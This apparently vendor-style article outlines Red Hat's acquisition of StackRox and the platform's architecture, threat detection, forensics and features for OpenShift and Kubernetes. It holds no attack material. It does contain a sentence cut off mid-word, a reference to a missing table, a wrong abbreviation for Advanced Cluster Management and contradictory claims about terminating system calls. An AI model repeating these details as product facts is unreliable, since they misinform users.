Red Hat StackRox Security – Securing Cloud-Native Applications and Containers

Prepared by: Kerem Çeliker / Software Defined X (SDX) Business Unit

In January 2021, Red Hat announced its acquisition of California-based Kubernetes security company StackRox, founded in 2014. This move is considered one of the most strategic acquisitions for Red Hat, aiming to strengthen its position in the DevSecOps security market within enterprise infrastructure.

StackRox complements Red Hat’s existing portfolio by bringing critical security capabilities that were previously lacking in its infrastructure and complex platform requirements.

DevSecOps, the combination of DevOps and security operations, is becoming a top priority for enterprise customers. With its seamless integration into existing DevOps and CI/CD tools, StackRox delivers comprehensive DevSecOps for Advanced Kubernetes on the OpenShift platform.

What Sets StackRox Apart?

Since its inception, StackRox has focused on securing software and ensuring business continuity. As containers and Kubernetes rapidly gained momentum and became an industry standard, the company swiftly doubled down on its Kubernetes Security Platform.

The key distinction between Red Hat OpenShift and Kubernetes lies in their tight integration. While competitors mainly focus on traditional security approaches, StackRox leverages core elements and native workflows of OpenShift and Advanced Kubernetes to provide an end-to-end solution for CI/CD, DevOps, and DevSecOps processes across the entire Kubernetes platform.

With its contextual insight AI, StackRox delivers real-time vulnerability data, severity assessments, scoring, and recommendations across all Kubernetes components, ensuring that users have timely and actionable security intelligence.

StackRox integrates closely with global databases and logs collected from all Red Hat OpenShift and Kubernetes components to identify security vulnerabilities. It prevents misconfigured components, risky integrations, and internal/external deployments as required, leveraging its Smart-Sensors that are fully aligned with Kubernetes.

For real-time security analysis, traffic visualization, and security recommendations, it operates seamlessly with Istio in Kubernetes infrastructure and Service Mesh in Red Hat OpenShift.

Through integration with the Red Hat OpenShift and Kubernetes API Web Console, StackRox provides compliance checks against CIS, NIST, PCI, and HIPAA standards, ensuring secure automation for distributed workloads.

StackRox brings end-to-end security and visibility to OpenShift through native integration with CRI-O (Container Runtime Interface), OpenShift SDN (CNI Network), and Istio-based OpenShift Service Mesh.

StackRox Provides Full Integration for Hybrid and Multi-Cloud Environments

Red Hat has long recognized the need to manage cluster lifecycles and workload management for applications running in non-OpenShift environments such as Amazon EKS, Microsoft AKS, Google GKE, and IBM Kubernetes Service IKS.

Following the IBM acquisition, Red Hat transformed IBM Multi-Cloud Manager into an open-source project, rebranding and modernizing it as Red Hat Advanced Cluster Management (ACS) for both Kubernetes and Red Hat OpenShift. This evolution now enables comprehensive solutions for u

StackRox Platform Architecture and How It Works

The StackRox Kubernetes-Native Security Platform operates under three core components:

• StackRox Central
• StackRox Sensor
• StackRox Collector

StackRox Central

StackRox Central serves as the command center — the brain of the operation. It is both a user interface and the core where API-Server and scanning processes occur, data analytics and analysis are conducted, and integrations with third-party tools and solutions are managed. Additionally, it is the hub where alerts are defined and Web-Hook integrations are configured.

StackRox Sensor

StackRox Sensor and Collector deployment operate as Daemon Sets within the Kubernetes infrastructure. They function with read-only access and do not have write permissions to your Red Hat OpenShift or Kubernetes clusters. Therefore, they require minimal permissions and can act as anomaly or attack detection controllers, preventing potential threats in real time.

Policies implemented within Red Hat OpenShift and Kubernetes Clusters can either be customer-defined or based on other policies written by the customer. These policies leverage a machine learning infrastructure that continuously evolves, incorporating over 60 regularly updated policies to enhance sensor capabilities.

StackRox Collector

A Collector is deployed per node. This allows the Collector to operate in two different modes, based on user preference:

• eBPF Mode: The Collector can operate using the extended Berkeley Packet Filter to gather system information. In this mode, it continuously processes network data, contributing to forensic analysis architecture.
• Kernel Module Mode: For customers using older Linux kernel versions that do not support eBPF, the Collector can operate as a kernel module. In this mode, it continues to collect data from each node and sends it back to the correlation pool within the sensor.

During this process, all operations across Red Hat OpenShift and Kubernetes Clusters are correlated. The data is first sent to StackRox Central and then to the Central Collectors (StackRox Central Collector). Data from all clusters is comprehensively correlated, after which rules, permission requirements, and controls are activated. Finally, the actions to be taken are sent back to Kubernetes for implementation.

Active Threat Response Workflow in StackRox

If malicious activity occurs within a specific POD or code component in a Deployment, the system prioritizes preventing disruption to the existing structure. The system call table is not blocked, nor are related system calls or processes terminated. This approach ensures targeted threat response without affecting other system components.

Incident Handling and Forensics in StackRox

During a similar incident, StackRox can instruct OpenShift and Kubernetes to terminate the affected pod and create a new one. While the StackRox Collector is running, it gathers all forensic and investigative data from existing processes, system calls, and network information in the cluster.

The collected data is encrypted and stored centrally, allowing it to be reflected in the Security Incident Center or transferred to other applications. This enables forensic analysis to be conducted later if necessary and provides actionable insights based on predefined rules to effectively respond to threats.

3 Key Characteristics of StackRox Detect, Prevent, and Respond

1. Attack Visibility : Through deployed sensors, the product continuously monitors millions of signals, detecting abnormal activities in each container during runtime and immediately mitigating potential threats.
2. Kill-Chain Analysis : With its continuously learning AI, the product can chronologically analyze how an attacker gained access, infiltrated the environment, and initiated attacks, conducting a deep root cause analysis.
3. Threat Prevention : The product effectively mitigates the impact of threats by automatically blocking, isolating, and containing them.

Features of StackRox Kubernetes-Native Security Platform

• Asset Visibility : Discovers all containers within a cluster and groups services in applications to provide a comprehensive view of assets for threat detection.
• Threat Visibility : Creates an extensive threat monitoring network by continuously monitoring file systems, network communications, processes, and container-related events, providing low-noise data for threat detection.
• Operational Visibility : Monitors communications across all containers, supplying valid data sources for anomaly detection and identification.
• Extended Monitoring Scope : Monitoring is conducted across five dimensions: Initial Access, Privilege Escalation, Persistence, Lateral Movement, and Targets.
  Automated Machine Learning : Applies fully automated learning based on changes in container activity.
• Automated Remediation and Response : Automatically responds to detected threats by blocking unauthorized instructions, terminating system calls, or isolating affected containers.
• Policy Customization : While StackRox provides pre-configured common templates, users can also customize protection policies according to their specific workflows.
• Alert Context : Provides detailed context to inform decision-making in response to security incidents.
• Intuitive Interface : Ensures quick setup, configuration, and user-friendly management.
• Independent Integration : Supports adaptation and full integration with various platforms, including DevOps, CI/CD orchestration, automation tools, and PaaS/SaaS/IaaS.
• Insightful Reporting : Offers risk assessment and forecasting based on comprehensive security data, including vulnerability analysis, detailed configurations, and network and Central Cluster insights.

StackRox enables comprehensive interaction through web interfaces, command lines, and APIs. StackRox Detect and Respond provides independent support for various platforms and tools, as listed in the table below.

Red Hat StackRox breaks down operational barriers between Software Developers, DevOps/DevSecOps, and Security teams, enabling seamless collaboration throughout development and operations.

References

https://www.redhat.com/en/blog/red-hat-closes-acquisition-stackrox